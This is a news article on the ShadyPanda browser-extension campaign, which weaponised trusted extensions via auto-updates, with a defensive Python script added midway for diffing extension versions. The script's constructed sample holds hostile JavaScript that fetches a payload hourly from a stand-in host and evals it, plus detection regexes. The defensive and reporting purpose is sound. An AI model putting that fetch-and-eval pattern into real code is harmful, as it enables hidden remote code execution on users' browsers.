ShadyPanda Takes its Time to Weaponize Legitimate Extensions
Over the past seven years, ShadyPanda has uploaded more than 100 malicious browser extensions, disguised as ordinary tools to gain user trust before carrying out attacks. These extensions can track user behavior, steal browsing history and sensitive data, and spread malicious code through the auto-update mechanism. Once activated, some extensions can remotely control browser functions and even hijack search traffic for financial gain. The group relies on a long-term dormancy strategy, continually publishing malware under legitimate developer accounts, and poses a serious threat to corporate internal data security. 2025-12-05 11:07:48 Author: securityboulevard.com

ShadyPanda has been playing the long game. Over the last seven years, the group has been uploading malicious extensions on the downlow, gaining user trust and then weaponizing them.  

According to Koi Security researchers, ShadyPanda has published more than 100 malicious extensions that can track and profile Chrome and Microsoft Edge users as well as execute a payload on their systems. Seems like users have fallen for their machinations — the extensions have been downloaded more than four million times, with some still available to unsuspecting users.

“Malicious code poses a real challenge since it closely resembles legitimate code, leveraging the same convenience features but with bad intent,” says Diane Downie, senior software architect at Black Duck.  

Not all of ShadyPanda’s extensions started as malicious. Early on, the group uploaded five legitimate extensions to the official Google store — three were published between 2018 and 2019. After Google gave them ‘Featured’ and ‘Verified’ statuses, the extensions were weaponized via a malicious update sometime in 2024, with the Clean Master extension being installed 300,000 times. Through that update, the extensions became a framework for remote code execution.  

“These extensions now run hourly remote code execution — downloading and executing arbitrary JavaScript with full browser access,” according to a Koi blog. “They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.” 

The auto-update mechanisms that are “designed to keep users safe became the attack vector,” says Randolph Barr, chief information security officer at Cequence Security. “Chrome and Edge’s trusted update pipelines silently delivered malware with no phishing, no social engineering, and no user interaction. What were benign productivity tools suddenly became surveillance platforms.”

The group has been busy with its nefarious acts, running an affiliate fraud campaign in 2023 — ShadyPanda published 20 Chrome extensions under “nuggetsno15” and 125 Edge extensions under the name Zhang. In that campaign, affiliate tracking codes were injected, unbeknownst to victims, every time they clicked on eBay, Amazon or Booking.com.  

ShadyPanda followed that campaign in 2024 with something much bolder. “The next wave, in early 2024, shifted from passive monetization to active browser control. The Infinity V+ extension exemplifies this phase,” Koi Security says. “Disguised as a new tab productivity tool, it hijacked core browser functionality,” using search redirection to a browser hijacker called trovi.com to log, monetize and sell search queries. It used cookie exfiltration, reading “cookies from specific domains and send(ing) tracking data to nossl.dergoodting.com” then creating “unique identifiers to monitor browsing activity. All without consent or disclosure.”

The group relied on search query harvesting to send “every keystroke in the search box sent to external servers (s-85283.gotocdn[.]com and s-82923.gotocdn[.]com).” That way, they got “real-time profiling of user interests before you even hit enter [with] the extension capturing partial queries, typos, corrections – building a detailed map of your thought process,” Koi Security researchers wrote.

All were “transmitted over unencrypted HTTP connections, making the data easy to intercept and monetize,” the researchers say. “Not just what you search for, but how you think about searching for it.” 

Barr says the risk extends beyond people. “For companies, a malicious browser extension can access everything a user sees—including session cookies, API keys, cloud console tokens, developer credentials, and internal SaaS traffic,” he says. 

Infected developer workstations, he points out, “can lead straight to repository breach and software supply chain infiltration” with every login to cloud services, internal dashboards, API gateways, or CI/CD pipelines “accessible to the attacker.” 

Barr calls ShadyPanda’s activities “a textbook example of a modern supply-chain vulnerability where the trust entrenched in browser ecosystems is leveraged against consumers” and which “mirrors the operating style of several long-term China-nexus cyber-espionage groups: patient, well-funded, and focused on high-value data gathering.” 

So far, attribution has not been proven. Still, Barr says, “the tactics, extensive stay time, and strategic nature of the operation are consistent with China-linked activities identified by several threat intelligence teams over the years.” 

Also of concern is how ShadyPanda operated under the radar. “What’s most striking is how long this campaign remained undetected: seven years of quietly building distribution, acquiring compromised developer accounts, publishing legitimate extensions, and waiting for the right moment to activate the malicious payloads,” says Barr, who notes the group “emphasizes the reality that browser extension ecosystems remain one of the least controlled and most vulnerable areas of the modern enterprise attack surface” and that traditional ML-based scanning in Chrome and stricter review processes in Edge “aren’t equipped to detect delayed malicious updates or compromised developer accounts.”
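The two quotes above from Barr describe the same blind spot: store-side review looks at the extension as submitted, while the damage arrives later as an update that adds permissions and starts pulling remote JavaScript. The script below is an added example (not Koi Security's tooling or anything from the Security Boulevard article) of how a defender can triage that kind of update locally. It assumes the manifest.json and bundled script of a baseline version and of the updated version are available as text, for instance copied out of the browser profile's extension directory, and the sample manifests, the `updates.example.invalid` endpoint and the permission and regex lists are constructed for the example.

```python
"""Added example: compare a baseline extension version with an update and flag the
changes the article describes, where a benign extension gains broad permissions and
begins fetching and executing remote JavaScript on a timer.

Assumptions: both versions' manifest.json and background script are available as
text; the permission set and regexes below are heuristics chosen for this example."""
import json
import re

# Permissions that give an extension broad visibility into browsing or cookies.
HIGH_RISK_PERMISSIONS = {
    "cookies", "webRequest", "webRequestBlocking", "tabs", "history",
    "scripting", "declarativeNetRequest", "<all_urls>",
}

# Source patterns for dynamic code execution, cleartext endpoints and periodic work.
REMOTE_CODE_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bimportScripts\s*\(")
HTTP_URL_RE = re.compile(r"http://[A-Za-z0-9.\-]+(?:/[^\s\"']*)?")
SCHEDULE_RE = re.compile(r"chrome\.alarms\.create\s*\(")


def manifest_permissions(manifest: dict) -> set:
    """Collect declared, optional and host permissions (works for MV2 and MV3)."""
    perms = set(manifest.get("permissions", []))
    perms |= set(manifest.get("optional_permissions", []))
    perms |= set(manifest.get("host_permissions", []))
    return perms


def scan_source(js: str) -> dict:
    """Heuristic scan of one script for the patterns above."""
    return {
        "remote_code": bool(REMOTE_CODE_RE.search(js)),
        "http_endpoints": set(HTTP_URL_RE.findall(js)),
        "scheduled": bool(SCHEDULE_RE.search(js)),
    }


def triage_update(old_manifest: dict, old_js: str, new_manifest: dict, new_js: str) -> dict:
    """Compare two versions; verdict is 'review' when the update adds a high-risk
    permission, remote code loading, a cleartext http:// endpoint or a timer."""
    added = manifest_permissions(new_manifest) - manifest_permissions(old_manifest)
    old_scan, new_scan = scan_source(old_js), scan_source(new_js)
    findings = {
        "new_high_risk_permissions": sorted(added & HIGH_RISK_PERMISSIONS),
        "remote_code_introduced": new_scan["remote_code"] and not old_scan["remote_code"],
        "new_http_endpoints": sorted(new_scan["http_endpoints"] - old_scan["http_endpoints"]),
        "scheduled_work_introduced": new_scan["scheduled"] and not old_scan["scheduled"],
    }
    findings["verdict"] = "review" if any(findings.values()) else "ok"
    return findings


# Constructed sample data: a benign "Tab Cleaner" v1.0 and a v2.0 update of it.
BASELINE_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Tab Cleaner", "version": "1.0",
  "permissions": ["storage"],
  "background": {"service_worker": "background.js"}
}""")
BASELINE_JS = """
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({ cleaned: 0 });
});
"""

UPDATED_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Tab Cleaner", "version": "2.0",
  "permissions": ["storage", "alarms", "cookies", "tabs"],
  "host_permissions": ["<all_urls>"],
  "background": {"service_worker": "background.js"}
}""")
# Constructed update: hourly alarm that fetches a script over plaintext HTTP and evals it.
UPDATED_JS = """
chrome.alarms.create("sync", { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(() => {
  fetch("http://updates.example.invalid/payload.js")
    .then((r) => r.text())
    .then((code) => eval(code));
});
"""

if __name__ == "__main__":
    report = triage_update(BASELINE_MANIFEST, BASELINE_JS, UPDATED_MANIFEST, UPDATED_JS)
    print(json.dumps(report, indent=2))
```

The point of diffing against a recorded baseline rather than scanning a single version is that it catches exactly the delayed change Barr describes: an extension that was clean at review time and acquires `cookies`, `tabs` and `<all_urls>` plus a scheduled remote fetch in a later release. Run it against the versions you have on disk, and treat a `review` verdict as a prompt to pull the extension from managed browsers until someone has read the new code.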

Downie warns the industry not to “let its guard down as bad actors have strong incentives to play the long game in a landscape where almost everything is software-enabled.” She encourages the adoption of zero trust to combat miscreants like ShadyPanda. 

Article source: https://securityboulevard.com/2025/12/shadypanda-takes-its-time-to-weaponize-legitimate-extensions/